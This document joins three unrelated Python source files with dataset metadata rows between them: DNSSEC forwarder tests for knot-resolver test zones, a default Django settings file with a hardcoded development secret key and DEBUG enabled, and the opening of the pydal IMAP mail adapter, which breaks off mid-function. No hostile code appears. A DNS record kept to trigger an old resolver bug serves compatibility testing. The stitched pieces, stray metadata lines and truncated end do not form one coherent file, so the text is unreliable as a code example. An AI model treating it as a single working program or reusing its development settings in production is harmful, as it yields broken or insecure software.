test.knot-resolver.cz. 3600 IN RRSIG DNSKEY 13 3 3600 20370119141532 20190205124532 60526 test.knot-resolver.cz. TCJGKcojvwe5cQYJaj+vMS5/lW2xLDVi cABjowFhQ3ttTIfjNINBK1sAJgybmdtd 5GcBlgXOPz+QWRFJUnRU2g==
;AUTHORITY
;ADDITIONAL""")
def test_supports_DNSKEY(forwarder, tcp):
return answer_checker.send_and_check(DNSKEY_QUERY,
DNSKEY_ANSWER,
forwarder,
ALL - {"additional", "authority"},
tcp=tcp)
DS_QUERY = answer_checker.make_random_case_query("test.knot-resolver.cz", "DS", want_dnssec=True)
DS_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
test.knot-resolver.cz. IN DS
;ANSWER
test.knot-resolver.cz. 1800 IN DS 0 8 2 0000000000000baff1ed10ca1beefc0111ded1cedeadadd011c0feecaca0b011
test.knot-resolver.cz. 1800 IN DS 60526 13 2 9E526A3D1D1D3F78BD11ABDCE8DE5A6CF9212CD2575D28FC10EBC046 F001AEA8
test.knot-resolver.cz. 1800 IN RRSIG DS 13 3 1800 20190227092958 20190213075958 23292 knot-resolver.cz. 9yBl60FpEgGt5R5JAKWWK1n1AGLSoeQDsX3nfLz/gQtljhKgnKgkM10T MZKIPUUY9jczh89ChoqCYFr+4MzURw==
;AUTHORITY
;ADDITIONAL""")
# DS signature with tag 0 is left dangling in the zone to trigger a bug in building of
# chain of trust in older versions of Unbound
def test_supports_DS(forwarder, tcp):
return answer_checker.send_and_check(DS_QUERY,
DS_ANSWER,
forwarder,
HEADER | {"answerrrsigs"},
tcp=tcp)
NSEC_NEGATIVE_QUERY = answer_checker.make_random_case_query("nonexistent.nsec.test.knot-resolver.cz", "A", want_dnssec=True)
NSEC_NEGATIVE_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec.test.knot-resolver.cz. IN A
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
nsec.test.knot-resolver.cz. 7200 IN NSEC unsigned.nsec.test.knot-resolver.cz. A NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 4 7200 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. ugmndbqwWjM5Zc/ZCEt/FeGSuw70sasu jylUhFljwdalhRNNlLNcQY9Tlr8A8Vnc YJCwI36LrwAp9m/W2ysZxQ==
;ADDITIONAL""")
def test_negative_nsec_answers(forwarder, tcp):
return answer_checker.send_and_check(NSEC_NEGATIVE_QUERY,
NSEC_NEGATIVE_ANSWER,
forwarder,
HEADER | {"authority"}, tcp=tcp)
NSEC3_NEGATIVE_QUERY = answer_checker.make_random_case_query("nonexistent.nsec3.test.knot-resolver.cz", "A", want_dnssec=True)
NSEC3_NEGATIVE_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec3.test.knot-resolver.cz. IN A
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 6j18444t948b3ij9dlakm317q132ccii A NS SOA RRSIG DNSKEY NSEC3PARAM CDS CDNSKEY
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 druje9e1goigmosgk4m6iv7gbktg143a CNAME RRSIG
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. r7DbpNp4KXvV2a4TDoV3whUPpI6mmjKA bk5TQZnA/z1AwFMtzJDQJ7b9RCv2C9Es CbwKEa+/bLNH4N2Ed8RVPQ==
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370119135450 20190205122450 52462 nsec3.test.knot-resolver.cz. NXEa3JxBpufEqBDEUNQhH2kQpPQbXYDX /b1soMKA4CwSaRVgiMkw41vevUZ/XtPj SFl0D6ov88QEDLG2RzYy9g==
;ADDITIONAL""")
def test_negative_nsec3_answers(forwarder, tcp):
return answer_checker.send_and_check(NSEC3_NEGATIVE_QUERY,
NSEC3_NEGATIVE_ANSWER,
forwarder,
HEADER | {"authority"}, tcp=tcp)
UNKNOWN_TYPE_QUERY = answer_checker.make_random_case_query("weird-type.test.knot-resolver.cz", "TYPE20025", want_dnssec=True)
UNKNOWN_TYPE_ANSWER = dns.message.from_text(r""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 512
;QUESTION
weird-type.test.knot-resolver.cz. IN TYPE20025
;ANSWER
weird-type.test.knot-resolver.cz. 3506 IN TYPE20025 \# 4 deadbeef
weird-type.test.knot-resolver.cz. 3506 IN RRSIG TYPE20025 13 4 3600 20370119135450 20190205122450 58 test.knot-resolver.cz. eHON73HpRyhIalC4xHwu/zWcZWuyVC3T fpBaOQU1MabzitXBUy4dKoAMVXhcpj62 Pqiz2FxMMg6nXRQJupQDAA==
;AUTHORITY
;ADDITIONAL
""")
def test_unknown_rrtype(forwarder, tcp):
return answer_checker.send_and_check(UNKNOWN_TYPE_QUERY,
UNKNOWN_TYPE_ANSWER,
forwarder,
ALL - {"additional", "authority"},
tcp=tcp)
NONEXISTENT_DS_DELEGATION_NSEC_QUERY = answer_checker.make_random_case_query("unsigned.nsec.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DS_DELEGATION_NSEC_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
unsigned.nsec.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
unsigned.nsec.test.knot-resolver.cz. 7200 IN NSEC *.wild.nsec.test.knot-resolver.cz. NS RRSIG NSEC
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
unsigned.nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 5 7200 20370119135450 20190205122450 25023 nsec.test.knot-resolver.cz. SWIzKCXTRQMz1n7myOioFrfbTljjR4jG NVRV43NWKtXQ6ftIR68wSVZ+6xsATHeG GXYYJxqaoviY+mLrJdJa/g==
;ADDITIONAL""")
def test_delegation_from_nsec_to_unsigned_zone(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DS_DELEGATION_NSEC_QUERY,
NONEXISTENT_DS_DELEGATION_NSEC_ANSWER,
forwarder,
ALL, tcp=tcp)
NONEXISTENT_DS_DELEGATION_NSEC3_QUERY = answer_checker.make_random_case_query("unsigned.nsec3.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DS_DELEGATION_NSEC3_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
unsigned.nsec3.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
gk65ucsupb4m139fn027ci6pl01fk5gs.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 mn71vn3kbnse5hkqqs7kc062nf9jna3u NS
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
gk65ucsupb4m139fn027ci6pl01fk5gs.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370119135450 20190205122450 52462 nsec3.test.knot-resolver.cz. WjWrhgoRmw8+xMuzcGLqPx76xEvPTQjN OaJOEXzK7409Jc7tVHgpolbNxsDdI0u+ h6s5Du78yx4z0QOCq2VEzg==
;ADDITIONAL""")
def test_delegation_from_nsec3_to_unsigned_zone(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DS_DELEGATION_NSEC3_QUERY,
NONEXISTENT_DS_DELEGATION_NSEC3_ANSWER,
forwarder,
ALL, tcp=tcp)
NONEXISTENT_DELEGATION_FROM_NSEC_QUERY = answer_checker.make_random_case_query("nonexistent.nsec.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DELEGATION_FROM_NSEC_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
nsec.test.knot-resolver.cz. 7200 IN NSEC unsigned.nsec.test.knot-resolver.cz. A NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 4 7200 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. ugmndbqwWjM5Zc/ZCEt/FeGSuw70sasu jylUhFljwdalhRNNlLNcQY9Tlr8A8Vnc YJCwI36LrwAp9m/W2ysZxQ==
;ADDITIONAL""")
def test_nonexistent_delegation_from_nsec(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DELEGATION_FROM_NSEC_QUERY,
NONEXISTENT_DELEGATION_FROM_NSEC_ANSWER,
forwarder,
ALL, tcp=tcp,
unset_flags=[dns.flags.AA])
# Some resolvers treat generated proof of non-existence as authoritative data
# and set AA flag in this kind of answer, we have to normalize this by unsetting
# it.
NONEXISTENT_DELEGATION_FROM_NSEC3_QUERY = answer_checker.make_random_case_query("nonexistent.nsec3.test.knot-resolver.cz", "DS", want_dnssec=True)
NONEXISTENT_DELEGATION_FROM_NSEC3_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NXDOMAIN
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nonexistent.nsec3.test.knot-resolver.cz. IN DS
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 6j18444t948b3ij9dlakm317q132ccii A NS SOA RRSIG DNSKEY NSEC3PARAM CDS CDNSKEY
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 druje9e1goigmosgk4m6iv7gbktg143a CNAME RRSIG
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. r7DbpNp4KXvV2a4TDoV3whUPpI6mmjKA bk5TQZnA/z1AwFMtzJDQJ7b9RCv2C9Es CbwKEa+/bLNH4N2Ed8RVPQ==
af4kdouqgq3k3j0boq2bqlf4hi14c8qa.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370119135450 20190205122450 52462 nsec3.test.knot-resolver.cz. NXEa3JxBpufEqBDEUNQhH2kQpPQbXYDX /b1soMKA4CwSaRVgiMkw41vevUZ/XtPj SFl0D6ov88QEDLG2RzYy9g==
;ADDITIONAL""")
def test_nonexistent_delegation_from_nsec3(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_DELEGATION_FROM_NSEC3_QUERY,
NONEXISTENT_DELEGATION_FROM_NSEC3_ANSWER,
forwarder,
ALL, tcp=tcp,
unset_flags=[dns.flags.AA])
NONEXISTENT_TYPE_NSEC3_QUERY = answer_checker.make_random_case_query("nsec3.test.knot-resolver.cz", "TYPE65281", want_dnssec=True)
NONEXISTENT_TYPE_NSEC3_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nsec3.test.knot-resolver.cz. IN TYPE65281
;ANSWER
;AUTHORITY
nsec3.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN NSEC3 1 0 10 9b987e46196cd181 6j18444t948b3ij9dlakm317q132ccii A NS SOA RRSIG DNSKEY NSEC3PARAM CDS CDNSKEY
nsec3.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. 9Ne2jUhyILPa5r0lAUdqkHtbkggSiRbt yqRaH3ENGlYcIIA3Rib6U2js+wEQpYVs SdQPcuzwAkYGmsqroSnDIw==
mn71vn3kbnse5hkqqs7kc062nf9jna3u.nsec3.test.knot-resolver.cz. 7200 IN RRSIG NSEC3 13 5 7200 20370126162631 20190212145631 52462 nsec3.test.knot-resolver.cz. r7DbpNp4KXvV2a4TDoV3whUPpI6mmjKA bk5TQZnA/z1AwFMtzJDQJ7b9RCv2C9Es CbwKEa+/bLNH4N2Ed8RVPQ==
;ADDITIONAL""")
def test_nonexistent_type_nsec3(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_TYPE_NSEC3_QUERY,
NONEXISTENT_TYPE_NSEC3_ANSWER,
forwarder,
ALL, tcp=tcp)
NONEXISTENT_TYPE_NSEC_QUERY = answer_checker.make_random_case_query("nsec.test.knot-resolver.cz", "TYPE65281", want_dnssec=True)
NONEXISTENT_TYPE_NSEC_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
nsec.test.knot-resolver.cz. IN TYPE65281
;ANSWER
;AUTHORITY
nsec.test.knot-resolver.cz. 3600 IN SOA knot-s-01.nic.cz. hostmaster.nic.cz. 2018042476 10800 3600 1209600 7200
nsec.test.knot-resolver.cz. 7200 IN NSEC unsigned.nsec.test.knot-resolver.cz. A NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY
nsec.test.knot-resolver.cz. 3600 IN RRSIG SOA 13 4 3600 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. Nwpe3F7+fiCeGgyP+0WgyGYC5N8MY4Pc bipFKsHBxgkwkdEyV395VvYCbhz5YuJb SyXsv9tXOVN+XSb5Sac8uQ==
nsec.test.knot-resolver.cz. 7200 IN RRSIG NSEC 13 4 7200 20370126162631 20190212145631 25023 nsec.test.knot-resolver.cz. ugmndbqwWjM5Zc/ZCEt/FeGSuw70sasu jylUhFljwdalhRNNlLNcQY9Tlr8A8Vnc YJCwI36LrwAp9m/W2ysZxQ==
;ADDITIONAL""")
def test_nonexistent_type_nsec(forwarder, tcp):
return answer_checker.send_and_check(NONEXISTENT_TYPE_NSEC_QUERY,
NONEXISTENT_TYPE_NSEC_ANSWER,
forwarder,
ALL, tcp=tcp)
| bsd-2-clause | -6,005,803,781,573,818,000 | 47.790698 | 247 | 0.71645 | false |
subash68/pyconvideo | src/pyconvideo/settings.py | 1 | 3180 | """
Django settings for pyconvideo project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$@_5k3q-++9=bs50d0+tjkw^(iy+_5z$ycu!9l-o-r4_co1#ww'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pyconvideo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pyconvideo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| gpl-3.0 | -5,179,506,293,819,358,000 | 24.853659 | 91 | 0.688679 | false |
xiang12835/python_web | py2_web2py/web2py/gluon/packages/dal/pydal/contrib/imap_adapter.py | 4 | 43046 | # -*- coding: utf-8 -*-
import datetime
import re
import sys
from .._globals import IDENTITY, GLOBAL_LOCKER
from .._compat import PY2, integer_types, basestring
from ..connection import ConnectionPool
from ..objects import Field, Query, Expression
from ..helpers.classes import SQLALL
from ..helpers.methods import use_common_filters
from ..adapters.base import NoSQLAdapter
long = integer_types[-1]
class IMAPAdapter(NoSQLAdapter):
""" IMAP server adapter
This class is intended as an interface with
email IMAP servers to perform simple queries in the
web2py DAL query syntax, so email read, search and
other related IMAP mail services (as those implemented
by brands like Google(r), and Yahoo!(r)
can be managed from web2py applications.
The code uses examples by Yuji Tomita on this post:
http://yuji.wordpress.com/2011/06/22/python-imaplib-imap-example-with-gmail/#comment-1137
and is based in docs for Python imaplib, python email
and email IETF's (i.e. RFC2060 and RFC3501)
This adapter was tested with a small set of operations with Gmail(r). Other
services requests could raise command syntax and response data issues.
It creates its table and field names "statically",
meaning that the developer should leave the table and field
definitions to the DAL instance by calling the adapter's
.define_tables() method. The tables are defined with the
IMAP server mailbox list information.
.define_tables() returns a dictionary mapping dal tablenames
to the server mailbox names with the following structure:
{<tablename>: str <server mailbox name>}
Here is a list of supported fields:
=========== ============== ===========
Field Type Description
=========== ============== ===========
uid string
answered boolean Flag
created date
content list:string A list of dict text or html parts
to string
cc string
bcc string
size integer the amount of octets of the message*
deleted boolean Flag
draft boolean Flag
flagged boolean Flag
sender string
recent boolean Flag
seen boolean Flag
subject string
mime string The mime header declaration
email string The complete RFC822 message (*)
attachments list Each non text part as dict
encoding string The main detected encoding
=========== ============== ===========
(*) At the application side it is measured as the length of the RFC822
message string
WARNING: As row id's are mapped to email sequence numbers,
make sure your imap client web2py app does not delete messages
during select or update actions, to prevent
updating or deleting different messages.
Sequence numbers change whenever the mailbox is updated.
To avoid this sequence numbers issues, it is recommended the use
of uid fields in query references (although the update and delete
in separate actions rule still applies).
::
# This is the code recommended to start imap support
# at the app's model:
imapdb = DAL("imap://user:password@server:port", pool_size=1) # port 993 for ssl
imapdb.define_tables()
Here is an (incomplete) list of possible imap commands::
# Count today's unseen messages
# smaller than 6000 octets from the
# inbox mailbox
q = imapdb.INBOX.seen == False
q &= imapdb.INBOX.created == datetime.date.today()
q &= imapdb.INBOX.size < 6000
unread = imapdb(q).count()
# Fetch last query messages
rows = imapdb(q).select()
# it is also possible to filter query select results with limitby and
# sequences of mailbox fields
set.select(<fields sequence>, limitby=(<int>, <int>))
# Mark last query messages as seen
messages = [row.uid for row in rows]
seen = imapdb(imapdb.INBOX.uid.belongs(messages)).update(seen=True)
# Delete messages in the imap database that have mails from mr. Gumby
deleted = 0
for mailbox in imapdb.tables
deleted += imapdb(imapdb[mailbox].sender.contains("gumby")).delete()
# It is possible also to mark messages for deletion instead of ereasing them
# directly with set.update(deleted=True)
# This object give access
# to the adapter auto mailbox
# mapped names (which native
# mailbox has what table name)
imapdb.mailboxes <dict> # tablename, server native name pairs
# To retrieve a table native mailbox name use:
imapdb.<table>.mailbox
### New features v2.4.1:
# Declare mailboxes statically with tablename, name pairs
# This avoids the extra server names retrieval
imapdb.define_tables({"inbox": "INBOX"})
# Selects without content/attachments/email columns will only
# fetch header and flags
imapdb(q).select(imapdb.INBOX.sender, imapdb.INBOX.subject)
"""
drivers = ('imaplib',)
types = {
'string': str,
'text': str,
'date': datetime.date,
'datetime': datetime.datetime,
'id': long,
'boolean': bool,
'integer': int,
'bigint': long,
'blob': str,
'list:string': str
}
dbengine = 'imap'
REGEX_URI = re.compile('^(?P<user>[^:]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|[^\:@]+)(\:(?P<port>[0-9]+))?$')
def __init__(self,
db,
uri,
pool_size=0,
folder=None,
db_codec ='UTF-8',
credential_decoder=IDENTITY,
driver_args={},
adapter_args={},
do_connect=True,
after_connection=None):
super(IMAPAdapter, self).__init__(
db=db,
uri=uri,
pool_size=pool_size,
folder=folder,
db_codec=db_codec,
credential_decoder=credential_decoder,
driver_args=driver_args,
adapter_args=adapter_args,
do_connect=do_connect,
after_connection=after_connection)
# db uri: [email protected]:[email protected]:123
# TODO: max size adapter argument for preventing large mail transfers
if do_connect: self.find_driver(adapter_args)
self.credential_decoder = credential_decoder
self.driver_args = driver_args
self.adapter_args = adapter_args
self.mailbox_size = None
self.static_names = None
self.charset = sys.getfilesystemencoding()
# imap class
self.imap4 = None
uri = uri.split("://")[1]
""" MESSAGE is an identifier for sequence number"""
self.flags = {'deleted': '\\Deleted', 'draft': '\\Draft',
'flagged': '\\Flagged', 'recent': '\\Recent',
'seen': '\\Seen', 'answered': '\\Answered'}
self.search_fields = {
'id': 'MESSAGE', 'created': 'DATE',
'uid': 'UID', 'sender': 'FROM',
'to': 'TO', 'cc': 'CC',
'bcc': 'BCC', 'content': 'TEXT',
'size': 'SIZE', 'deleted': '\\Deleted',
'draft': '\\Draft', 'flagged': '\\Flagged',
'recent': '\\Recent', 'seen': '\\Seen',
'subject': 'SUBJECT', 'answered': '\\Answered',
'mime': None, 'email': None,
'attachments': None
}
m = self.REGEX_URI.match(uri)
user = m.group('user')
password = m.group('password')
host = m.group('host')
port = int(m.group('port'))
over_ssl = False
if port==993:
over_ssl = True
driver_args.update(host=host,port=port, password=password, user=user)
def connector(driver_args=driver_args):
# it is assumed sucessful authentication alLways
# TODO: support direct connection and login tests
if over_ssl:
self.imap4 = self.driver.IMAP4_SSL
else:
self.imap4 = self.driver.IMAP4
connection = self.imap4(driver_args["host"], driver_args["port"])
data = connection.login(driver_args["user"], driver_args["password"])
# static mailbox list
connection.mailbox_names = None
# dummy dbapi functions
connection.cursor = lambda : self.fake_cursor
connection.close = lambda : None
connection.commit = lambda : None
return connection
self.db.define_tables = self.define_tables
self.connector = connector
if do_connect: self.reconnect()
def reconnect(self, f=None):
"""
IMAP4 Pool connection method
imap connection lacks of self cursor command.
A custom command should be provided as a replacement
for connection pooling to prevent uncaught remote session
closing
"""
if getattr(self, 'connection', None) is not None:
return
if f is None:
f = self.connector
if not self.pool_size:
self.connection = f()
self.cursor = self.connection.cursor()
else:
POOLS = ConnectionPool.POOLS
uri = self.uri
while True:
GLOBAL_LOCKER.acquire()
if not uri in POOLS:
POOLS[uri] = []
if POOLS[uri]:
self.connection = POOLS[uri].pop()
GLOBAL_LOCKER.release()
self.cursor = self.connection.cursor()
if self.cursor and self.check_active_connection:
try:
# check if connection is alive or close it
result, data = self.connection.list()
except:
# Possible connection reset error
# TODO: read exception class
self.connection = f()
break
else:
GLOBAL_LOCKER.release()
self.connection = f()
self.cursor = self.connection.cursor()
break
self.after_connection_hook()
def get_last_message(self, tablename):
last_message = None
# request mailbox list to the server if needed.
if not isinstance(self.connection.mailbox_names, dict):
self.get_mailboxes()
try:
result = self.connection.select(
self.connection.mailbox_names[tablename])
last_message = int(result[1][0])
# Last message must be a positive integer
if last_message == 0:
last_message = 1
except (IndexError, ValueError, TypeError, KeyError):
e = sys.exc_info()[1]
self.db.logger.debug("Error retrieving the last mailbox" +
" sequence number. %s" % str(e))
return last_message
def get_uid_bounds(self, tablename):
if not isinstance(self.connection.mailbox_names, dict):
self.get_mailboxes()
# fetch first and last messages
# return (first, last) messages uid's
last_message = self.get_last_message(tablename)
result, data = self.connection.uid("search", None, "(ALL)")
uid_list = data[0].strip().split()
if len(uid_list) <= 0:
return None
else:
return (uid_list[0], uid_list[-1])
def convert_date(self, date, add=None, imf=False):
if add is None:
add = datetime.timedelta()
""" Convert a date object to a string
with d-Mon-Y style for IMAP or the inverse
case
add <timedelta> adds to the date object
"""
months = [None, "JAN","FEB","MAR","APR","MAY","JUN",
"JUL", "AUG","SEP","OCT","NOV","DEC"]
if isinstance(date, basestring):
# Prevent unexpected date response format
try:
if "," in date:
dayname, datestring = date.split(",")
else:
dayname, datestring = None, date
date_list = datestring.strip().split()
year = int(date_list[2])
month = months.index(date_list[1].upper())
day = int(date_list[0])
hms = list(map(int, date_list[3].split(":")))
return datetime.datetime(year, month, day,
hms[0], hms[1], hms[2]) + add
except (ValueError, AttributeError, IndexError) as e:
self.db.logger.error("Could not parse date text: %s. %s" %
(date, e))
return None
elif isinstance(date, (datetime.date, datetime.datetime)):
if imf: date_format = "%a, %d %b %Y %H:%M:%S %z"
else: date_format = "%d-%b-%Y"
return (date + add).strftime(date_format)
else:
return None
@staticmethod
def header_represent(f, r):
from email.header import decode_header
text, encoding = decode_header(f)[0]
if encoding:
text = text.decode(encoding).encode('utf-8')
return text
def encode_text(self, text, charset, errors="replace"):
""" convert text for mail to unicode"""
if text is None:
text = ""
if PY2:
if isinstance(text, str):
if charset is None:
text = unicode(text, "utf-8", errors)
else:
text = unicode(text, charset, errors)
else:
raise Exception("Unsupported mail text type %s" % type(text))
return text.encode("utf-8")
else:
if isinstance(text, bytes):
return text.decode("utf-8")
return text
def get_charset(self, message):
charset = message.get_content_charset()
return charset
def get_mailboxes(self):
""" Query the mail database for mailbox names """
if self.static_names:
# statically defined mailbox names
self.connection.mailbox_names = self.static_names
return self.static_names.keys()
mailboxes_list = self.connection.list()
self.connection.mailbox_names = dict()
mailboxes = list()
x = 0
for item in mailboxes_list[1]:
x = x + 1
item = item.strip()
if not "NOSELECT" in item.upper():
sub_items = item.split("\"")
sub_items = [sub_item for sub_item in sub_items \
if len(sub_item.strip()) > 0]
# mailbox = sub_items[len(sub_items) -1]
mailbox = sub_items[-1].strip()
